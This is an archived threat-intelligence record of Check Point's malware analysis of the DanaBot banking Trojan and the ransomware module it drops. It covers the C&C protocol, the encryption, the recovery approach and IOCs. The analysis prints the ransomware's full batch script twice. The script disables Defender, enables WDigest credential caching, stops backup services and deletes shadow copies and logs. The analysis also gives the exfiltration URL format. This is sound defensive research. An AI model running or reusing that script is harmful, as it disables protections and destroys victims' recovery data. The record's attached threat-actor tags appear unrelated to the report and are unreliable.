{
	"id": "e2b1f2e6-dfd5-4dcf-bee8-dc2b976b8f7c",
	"created_at": "2026-04-06T03:37:12.984533Z",
	"updated_at": "2026-04-10T03:23:51.8183Z",
	"deleted_at": null,
	"sha1_hash": "28888a24663c5cecbc93baf5284e4010d499e5b7",
	"title": "DanaBot Demands a Ransom Payment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 116474,
	"plain_text": "DanaBot Demands a Ransom Payment\r\nBy deugenio\r\nPublished: 2019-06-20 · Archived: 2026-04-06 02:50:40 UTC\r\nResearch by: Yaroslav Harakhavik  and Aliaksandr Chailytko\r\nIt’s been over a year since DanaBot was first discovered, and its developers are still working to improve it and find new\r\nopportunities to collaborate with other malware actors.\r\nCheck Point Research has been tracking DanaBot campaigns since August 2018 and recently discovered that some bots\r\nbelonging to European campaigns had started dropping an executable file which turned out to be a ransomware written\r\nin Delphi.\r\nDanaBot was already involved in sending spam and cooperating with GootKit in the past, as well as dropping Remcos\r\nRAT on infected machines. While DanaBot is still actively supported, its operators now add new plugins and\r\nconfiguration files and update various parts of the malware (including string encryption and file name generation\r\nalgorithms, and even the communication protocol).\r\nIn the following report, we will review the latest updates in DanaBot’s functionality, and take a deep dive into the inner-workings and encryption methods of this new ransomware.\r\nDanaBot Overview\r\nDanaBot is a banking Trojan which is distributed using phishing emails. 
Links usually lead to either a JavaScript or\r\nPowerShell dropper.\r\nThe malware has the following capabilities:\r\nStealing browser and FTP client credentials\r\nCollecting cryptocurrency wallet credentials\r\nRunning a proxy on an infected machine\r\nPerforming Zeus-style web-injects\r\nTaking screenshots and recording video\r\nProviding remote control via RDP or VNC\r\nRequesting updates via TOR\r\nBypassing UAC using a WUSA exploit\r\nRequesting updates from the C\u0026C server and executing commands\r\nAll DanaBot versions communicate with the C\u0026C server via a custom TCP-based protocol over port 443.\r\nSince its first appearance, DanaBot has spread throughout Europe, Australia, New Zealand, the USA and Canada. Several\r\ncampaigns which target different countries were discovered. A campaign is defined by two hardcoded values:\r\nCampaign ID;\r\nCampaign salt – a number used for packet validation by the C\u0026C server\r\nhttps://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/\r\nPage 1 of 22\n\nCampaigns which are currently active are shown in Table 1.\r\nCampaign ID Campaign Salt Countries\r\n2 586856666 None\r\n3 897056567 Italy, Poland\r\n4 645456234 Australia\r\n5 423676934 Australia\r\n6 235791346 Australia\r\n7 765342789 Italy, Poland\r\n8 342768343 Canada, USA\r\n9 909445453 None\r\n11 445577321 Unknown\r\n14 653345567 Canada\r\n15 655222455 Poland, USA\r\n17 878777777 Unknown\r\n18 234456788 Unknown\r\n19 335347974 Unknown\r\n20 113334444 Unknown\r\n24 784356646 Unknown\r\nTable 1 – Active DanaBot campaigns\r\nThe Dropper\r\nThe initial infection vector is usually an email with a document or a link which leads to a malicious dropper.\r\nOne of the latest cases is a new Australian campaign (ID=6) which was discovered by Check Point in April 2019.\r\nDanaBot was spread in its usual way – phishing emails with links to a file uploaded to Google Docs.\r\n
Fig 1: Phishing email examples\r\nThe downloaded file turned out to be a VBS script which functions as a DanaBot dropper. The dropper unpacks the\r\nDanaBot downloader DLL into the %TEMP% directory and registers it as a service.\r\nFig 2: DanaBot VBS dropper\r\nDanaBot Downloader\r\nThe DanaBot downloader is represented by a 32- or 64-bit DLL which starts by calling its f0 function. After the January\r\n2019 update, the downloader took on many of the main module’s roles: for example, it bypasses UAC and pretends to\r\nbe a Windows System Event Notification Service. It communicates with C\u0026C servers, downloads DanaBot plugins and\r\nconfiguration files, updates itself, and executes the main module.\r\nIn January, the DanaBot downloader changed its communication protocol, obscuring it with AES256 encryption.\r\nThe new protocol was described in detail by ESET. The initial communication between an infected machine and a C\u0026C\r\nserver is shown in Figure 3.\r\nThe main points of the new protocol are:\r\n1. Both the bot and C\u0026C server generate a new AES256 key (AesKey in Figure 1) for every packet they send.\r\n2. The bot sends an RSA public key (RsaSessionKey in Figure 1) to the C\u0026C server which is used by the server to\r\nencrypt its generated AesKeys.\r\n3. The bot encrypts the generated AesKeys with a hardcoded public RSA key (HardcodedRsaKey in Figure 1). The\r\nprivate key is owned exclusively by the C\u0026C server.\r\nFig 3: Encryption in Bot-to-C\u0026C communication protocol\r\nThe layout of TCP packets for the latest communication protocol is described in Appendix A.\r\nThe DanaBot downloader can be detected by a public RSA key hardcoded into the DLL’s body. 
It’s usually XOR’ed\r\nwith a byte in the range [0x01; 0xFF].\r\nFig 4: The downloader’s hardcoded RSA public key\r\nThe new campaign sample requests the following modules and configuration files:\r\nModules:\r\nMain module\r\nStealer plugin\r\nVNC plugin\r\nRDP plugin\r\nTOR plugin\r\nConfiguration files:\r\nBitVideo – Process list to record\r\nBitFiles – List of cryptocurrency files\r\nKeyProcess – Process list for keylogging\r\nPFilter – List of websites for sniffing\r\nInject (or inject, inj, inj* or in*) – Web-inject configuration\r\nRedirect (redik*) – Configuration for redirection\r\nNonRansomware Distribution\r\nAt the end of April, the DanaBot C\u0026C server 95.179[.]186[.]57 started including a new module,\r\nD932613F6447F0C56744B1AD53230C62, in its list of available modules for a European campaign with ID=7. The module, which was an\r\nexecutable file written in Delphi, was named “crypt.”\r\nThe new module turned out to be a variant of the “NonRansomware” ransomware, which enumerates files on local drives\r\nand encrypts all of them except those in the Windows directory. The encrypted files have a .non extension. A ransom message\r\nHowToBackFiles.txt is placed in each directory which contains encrypted files.\r\nAt the beginning of May, this ransomware was found in the wild.\r\nFig 5: Ransom message\r\nAfter its execution, the malware puts a batch file b.bat in %TEMP% and runs it. 
The batch script contains the following\r\ncontent:\r\n@echo off\r\nset “__COMPAT_LAYER=RunAsInvoker”\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management” /v ClearPageFileAtShutDown /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v Hidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v SuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v ShowSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest” /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nnet stop mssqlserver\r\nnet stop sqlwriter\r\nnet stop VeeamEndpointBackupSvc\r\nnet stop mssqlfdlauncher\r\nnet stop cpqvcagent\r\nnet stop TeamViewer\r\nnet stop klsbackup2013pro\r\nnet stop foxitreaderservice\r\nnet stop mysql\r\nnet stop mssqlserver\r\nnet stop mysql501\r\nnet stop veeamdeploysvc\r\nnet stop veeamtransportsvc\r\nnet stop wuauserv\r\nnet stop sysmgmthp\r\nnet stop sysdown\r\nnet stop adobearmservice\r\nnet stop themes\r\nnet stop sqlbrowser\r\nnet stop sql backupmaster\r\nnet stop sqlagent$sql2008exp\r\nnet stop sqltelemetry$sqlexpress\r\nnet stop mssql$sqlexpress\r\nnet stop mikroclientwservice\r\nnet stop reportserver\r\nnet stop sqlserveragent\r\nnet stop MSSQL$MIKRO\r\nnet stop msdtc\r\nnet stop sqltelemetryvv\r\ntaskkill /F /IM Veam.EndPoint.Tray.exe\r\ntaskkill /F /IM jusched.exe\r\ntaskkill /F /IM jucheck.exe\r\ntaskkill /F /IM 
IAStorDataMgrSvc.exe\r\ntaskkill /F /IM IAStorIcon.exe\r\ntaskkill /F /IM isa.exe\r\ntaskkill /F /IM armsvc.exe\r\ntaskkill /F /IM TeamViewer.exe\r\ntaskkill /F /IM TeamViewer_Service.exe\r\ntaskkill /F /IM tv_w32.exe\r\ntaskkill /F /IM tv_x64.exe\r\npowercfg.exe -h off\r\nRD /S /Q “C:\\Windows\\Temp\\”\r\nRD /S /Q “C:\\Windows\\Logs\\”\r\nRD /S /Q “C:\\Windows\\Installer\\”\r\npowershell.exe -ExecutionPolicy Bypass\r\nDisable-ComputerRestore “C:\\”\r\nDisable-ComputerRestore “D:\\”\r\nDisable-ComputerRestore “E:\\”\r\nDisable-ComputerRestore “F:\\”\r\nDisable-ComputerRestore “H:\\”\r\nClear-EventLog “Windows PowerShell”\r\nClear-RecycleBin -Confirm:$false\r\nvssadmin delete shadows /all\r\nThe script is responsible for:\r\nEnabling the setting for showing hidden files\r\nDisabling Windows Defender\r\nEnabling ClearPageFileAtShutDown to purge pagefile.sys\r\nStopping services\r\nStopping monitoring software (Veeam, TeamViewer, etc.)\r\nDisabling hibernation\r\nRemoving logs\r\nBypassing the PowerShell Execution Policy\r\nDisabling restoration for the following logical disks: C, D, E, F, H\r\nClearing the event log and Recycle Bin\r\nDeleting shadow copies for all volumes\r\nThen the malware schedules a task which will execute the malware every 14 minutes. The full command line for\r\nschtasks.exe is shown in Figure 6.\r\nFig 6: Ransomware task creation\r\nThe obscured name of the task is just a damaged string “SysUtils.” The malware uses a simple algorithm and a\r\nhardcoded key “Hello World!” to decrypt the strings. 
The developers – deliberately or not – applied this algorithm to a\r\nplain string to create a task name.\r\nFig 7: Decrypting schtasks.exe parameters and damaging the task name by the same decryption algorithm\r\nThe string decryption algorithm is shown in Figure 8.\r\nFig 8: Decrypting strings that are used in the ransomware source code\r\nThe ransomware enumerates logical drives, visits all the directories except Windows, and encrypts all the files using\r\nAES128. The password is a string representation of the system volume serial number. Every file is encrypted in a\r\nseparate thread.\r\nThe victim ID which is shown in the ransom message is generated from the password (i.e. the C: drive serial number)\r\naccording to the following algorithm:\r\nFig 9: Victim ID generation algorithm\r\nBasically, this can be rewritten as the following equation:\r\nwhere  – encryption key,  – plain text,  – cipher text and  – text index.\r\nAs it is impossible to create an inverse function for this equation, it is likely that the malware operators have to\r\nbrute-force the password (p) on the basis of the known victim ID (c) and hardcoded key (k). The following code can be\r\nused to restore the password from the victim ID:\r\nFig 10: Restoring the password by the victim ID\r\nThe encryption itself is not obvious unless… it was copy-pasted from the unit tests of the\r\nDelphiEncryptionCompendium (DEC) library. The encryption function is a slightly modified DemoCipherFile\r\nprocedure of the library’s test project. 
The main difference is the use of the Panama hash instead of SHA1.\r\nA comparison of the disassembled code of the ransomware and the corresponding source code of the DEC test project is\r\nshown in Figures 11-12.\r\nFig 11: Ransomware: Objects initialization\r\nFig 12: DEC: Objects initialization\r\nThere is a very detailed description of the encryption process in the source code.\r\nFig 13: Comments for EncodeFile\r\nSo the only thing that is needed to restore the encrypted files is to call the DecodeFile function for all the encrypted files\r\nwith a password brute-forced using the known victim ID.\r\nA GUI tool for file decryption is attached at the end of this article.\r\nThe layout of an encrypted file and its structure are shown in Figure 14 and Table 2.\r\nFig 14: Encrypted file layout\r\nField Size\r\nCipher Identity 4 Bytes\r\nCipherMode 1 Byte\r\nHash Identity 3 Bytes\r\nSeed Size 1 Byte\r\nSeed Seed Size\r\nCipher Text Size 4 Bytes\r\nCipher Text Cipher Text Size\r\nChecksum Size 4 Bytes\r\nChecksum Checksum Size\r\nTable 2: The structure of an encrypted file\r\nFinally, the malware checks for a network connection and sends information about the infected PC to\r\nencrypter[.]webfoxsecurity[.]com. 
It first detects the version of Windows, generates a unique ID, retrieves the user name\r\nand builds the following string:\r\n{“#ersio.”:”1.4.3″, “win”:”\u003cWINDOWS_VERSION\u003e”, “hwid”:”\u003cUNIQUE_ID\u003e”, “UserName”:”User”, “Admin”:”0″}\r\nExample:\r\n{“#ersio.”:”1.4.3″, “win”:”Windows 7 Professional 32-bit”, “hwid”:”00029646″, “UserName”:”User”, “Admin”:”0″}\r\nUNIQUE_ID is generated based either on a UUID (by using UuidCreateSequential) or on the volume serial number if\r\nUuidCreateSequential fails.\r\nThe resulting string is Base64-encoded and sent to the previously mentioned address using a GET request in the\r\nfollowing format:\r\nhttp:[/]/encrypter[.]webfoxsecurity[.]com/api/key?k=\u003cBASE64\u003e\r\nConclusion\r\nFor almost a year, DanaBot has been extending its capabilities and evolving into a more sophisticated threat. We assume\r\nits operators will continue to add more improvements. Check Point provides protection against these threats. We’ll keep\r\nan eye on it and update you further.\r\nRansomware still remains a relatively stable source of income for cyber criminals. Therefore, such simple “copy-paste” encryptors as the one described here will continue to emerge constantly. Note – In general, we do not\r\nrecommend paying ransom to decrypt your files, and especially not in a case like this.\r\nAppendix A. 
DanaBot Downloader’s payload packet layout\r\nThe unencrypted packet layout and the meaning of its fields are shown in Figure 15 and Table 3.\r\nFig 15: Unencrypted initial payload packet layout\r\nOffset Size Purpose\r\n0x00 0x04 Packet header size (0xA7)\r\n0x04 0x08 Random number (rand_1)\r\n0x0C 0x08 Sum of header size and rand_1\r\n0x14 0x04 Campaign ID\r\n0x18 0x04 Message ID\r\n0x1C 0x04 Message parameter\r\n0x20 0x04 Random number (rand_2)\r\n0x24 0x04 Constant (0x00)\r\n0x28 0x04 Architecture (32, 64)\r\n0x2C 0x04 Windows version token\r\n0x30 0x04 0 or 0x03E9 (depends on Message ID)\r\n0x34 0x04 Constant (0x01)\r\n0x38 0x04 Admin status\r\n0x3C 0x08 Constant (0x01)\r\n0x44 0x01 Border\r\n0x45 0x20 Bot ID\r\n0x65 0x01 Border\r\n0x66 0x20 Module or Checksum #1 (depends on Message ID)\r\n0x86 0x01 Border\r\n0x87 0x20 Checksum #2\r\nTable 3: Packet layout\r\nChecksum #1 is required only in certain requests, such as an initial request when a bot communicates with the C\u0026C\r\nserver to announce its presence. Checksum #2 is placed at the end of every payload that the bot sends to the C\u0026C\r\nserver. Checksums are calculated by the following formulas:\r\nThe encrypted packet is preceded by a 24-byte header. The first 8 bytes contain the size of the payload packet, the next 8\r\nbytes contain a random 2-byte number, and the last 8 bytes are equal to the sum of the payload size and the random\r\nnumber.\r\nFig 16: Example of a payload packet header\r\nAppendix B. 
DanaBot IOCs\r\nC\u0026C server Status\r\n192.71.249.51 Alive\r\n178.209.51.211 Alive\r\n185.92.222.238 Down\r\n89.144.25.104 Down\r\n89.144.25.243 Alive\r\n84.54.37.102 Down\r\n149.28.180.182 Alive\r\n95.179.186.57 Alive\r\nDropper locations on Google Cloud\r\nhxxps://docs.google[.]com/uc?id=1q4EYE4umvEFfdlL4_IshSQ4UqnhWAg9t\r\nhxxps://docs.google[.]com/uc?id=1gu8efqkSDDXZIDMX2cnFc73NyyuVYIF0\r\nWebInject \u0026 Redirect IPs and domains\r\n194.76.225.28\r\n185.189.149.235\r\ndemo.maintrump.org\r\nkaosutdoaaf.pw\r\nkaosutdoaaf6.pw\r\nkaosjdoaaf6.pw\r\nkadosjdoaaf6.pw\r\nkadosjdoaf6.pw\r\nkadosjdoafa.pw\r\nkadosjdoiafa.pw\r\nkdosjdoiafa.pw\r\nkduwouewpew.pw\r\nkdguwoewpew.pw\r\nsfjskdjfwoiewwegroup.tech\r\nbrekwinarew.site\r\njklfsdkfjhwefjosdf.top\r\njklfsdkfjhwefjosdf.xyz\r\ngoskilindad.site\r\nmon-sta.com\r\nlindakiski.top\r\nlidaskiheg.space\r\nlnet4-data.com\r\nnet4-data.com\r\nlidaskiheg.site\r\nbruksialopws.icu\r\nbrukaisloap.club\r\nbraksiolsa.top\r\nbrukiloapos.xyz\r\noneuisopeweh.icu\r\nokjauwbueiws.xyz\r\nokjauwbueiws.top\r\nonueilsndsuywe.xyz\r\ngustemiaksa.icu\r\nthegiksjoute.online\r\nguksuoiew.top\r\ngustokiloe.xyz\r\ngousikolka.space\r\nthenautorern.tech\r\nnautorern.xyz\r\nkipokahynr.top\r\nkipokahynr.xyz\r\nmuabolksae.club\r\nmuoklaiow.xyz\r\nExamples of DanaBot modules\r\nModule MD5\r\nVBS Dropper a1f119be2c55029f4d38f9356a1cc680\r\nDownloader (x86) b0c1bdc0b21aa99e2d777eef39c18a11\r\nDownloader (x64) 11e7e83043259310a5ae8689b4e34992\r\nMain module (x86) ca8c3113b9afa9d8bb8fe1f6653a9547\r\nMain module (x64) eacd1da520a33d842b09cef81606c745\r\nPlugin MD5\r\nStealer (x86) ee89e89b0ee8f5b3241e69b4a6632b00\r\nStealer (x64) 7efc6b42338b28470716c126a3c1cc46\r\nVNC d917226cba970dcf3f2b7c59cf212221\r\nTOR bcf4a4a96b6dacd026d507d0e49797C6\r\nRDPWrap 
0f54d5a13821c0e31eb5730a4aba75f2\r\nAppendix C. NonRansomware IOCs\r\nmd5 sha256\r\na3629977d2c9f7eb30a13bdce14e3f45 5dad162cbc990d3f45d2fe3b9d96ebd0c4af92997f621a207387201ed6b34893\r\ne48067d2ad6adcbf2e4cf7e705d4bd82 8a21e1224a8f1d7dd9d4e42c78c829fb82808631577477e8f699f15feb7c8988\r\nSpawned processes\r\nC:\\Users\\\u003cUSER_NAME\u003e\\AppData\\Local\\Temp\\b.bat\r\nC:\\Windows\\System32\\schtasks.exe /c /Create /SC MINUTE /MO 14 /TN \\xc3\\xab\\xc3\\xb4\\xc3\\xa7\\xc3\\x89\\xc3\\xa5I\\xc3\\xb5\\xc3\\xa4 /TR “\u003cFILE_PATH\u003e” /F\r\nC:\\Windows\\System32\\cmd.exe /c %TEMP%\\b.bat\r\nDropped Files\r\n\u003cPATH_WITH_ENCRYPTED_FILES\u003e\\HowToBackFiles.txt\r\nNetwork\r\nhttp://encrypter.webfoxsecurity.com/api/key?k=\r\nMutexes\r\nRunningNow\r\nStrings\r\nxihuanya@protonmail.com\r\nHowToBackFiles.txt\r\n@echo off\r\nset “__COMPAT_LAYER=RunAsInvoker”\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management” /v ClearPageFileAtShutDown /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v Hidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v SuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced” /v ShowSuperHidden /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nreg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest” /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nnet stop mssqlserver\r\nnet stop sqlwriter\r\nnet stop VeeamEndpointBackupSvc\r\nnet stop mssqlfdlauncher\r\nnet stop cpqvcagent\r\nnet stop TeamViewer\r\nnet stop klsbackup2013pro\r\nnet stop 
foxitreaderservice\r\nnet stop mysql\r\nnet stop mssqlserver\r\nnet stop mysql501\r\nnet stop veeamdeploysvc\r\nnet stop veeamtransportsvc\r\nnet stop wuauserv\r\nnet stop sysmgmthp\r\nnet stop sysdown\r\nnet stop adobearmservice\r\nnet stop themes\r\nnet stop sqlbrowser\r\nnet stop sql backupmaster\r\nnet stop sqlagent$sql2008exp\r\nnet stop sqltelemetry$sqlexpress\r\nnet stop mssql$sqlexpress\r\nnet stop mikroclientwservice\r\nnet stop reportserver\r\nnet stop sqlserveragent\r\nnet stop MSSQL$MIKRO\r\nnet stop msdtc\r\nnet stop sqltelemetryvv\r\ntaskkill /F /IM Veam.EndPoint.Tray.exe\r\ntaskkill /F /IM jusched.exe\r\ntaskkill /F /IM jucheck.exe\r\ntaskkill /F /IM IAStorDataMgrSvc.exe\r\ntaskkill /F /IM IAStorIcon.exe\r\ntaskkill /F /IM isa.exe\r\ntaskkill /F /IM armsvc.exe\r\ntaskkill /F /IM TeamViewer.exe\r\ntaskkill /F /IM TeamViewer_Service.exe\r\ntaskkill /F /IM tv_w32.exe\r\ntaskkill /F /IM tv_x64.exe\r\npowercfg.exe -h off\r\nRD /S /Q “C:\\Windows\\Temp\\”\r\nRD /S /Q “C:\\Windows\\Logs\\”\r\nRD /S /Q “C:\\Windows\\Installer\\”\r\npowershell.exe -ExecutionPolicy Bypass\r\nDisable-ComputerRestore “C:\\”\r\nDisable-ComputerRestore “D:\\”\r\nDisable-ComputerRestore “E:\\”\r\nDisable-ComputerRestore “F:\\”\r\nDisable-ComputerRestore “H:\\”\r\nClear-EventLog “Windows PowerShell”\r\nClear-RecycleBin -Confirm:$false\r\nvssadmin delete shadows /all\r\nAppendix D. 
Check Point Signatures\r\nMalware CP Product Detect Name\r\nDanaBot\r\nAnti-Bot Trojan.Win32.DanaBot.*\r\nThreat Emulation Trojan.Win.DanaBot.A\r\nSandBlast Agent Trojan.Win.DanaBot.B\r\nNonRansomware\r\nAnti-Ransomware Ransomware.Win.TouchTrapFiles.A\r\nSandBlast Agent Gen.Win.DisWinDef.A\r\nDecryption tool\r\nThe NonDecryptor tool is available for download from the original article.\r\nSource: https://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2019/danabot-demands-a-ransom-payment/"
	],
	"report_names": [
		"danabot-demands-a-ransom-payment"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446632,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.pdf",
		"text": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.txt",
		"img": "https://archive.orkl.eu/28888a24663c5cecbc93baf5284e4010d499e5b7.jpg"
	}
}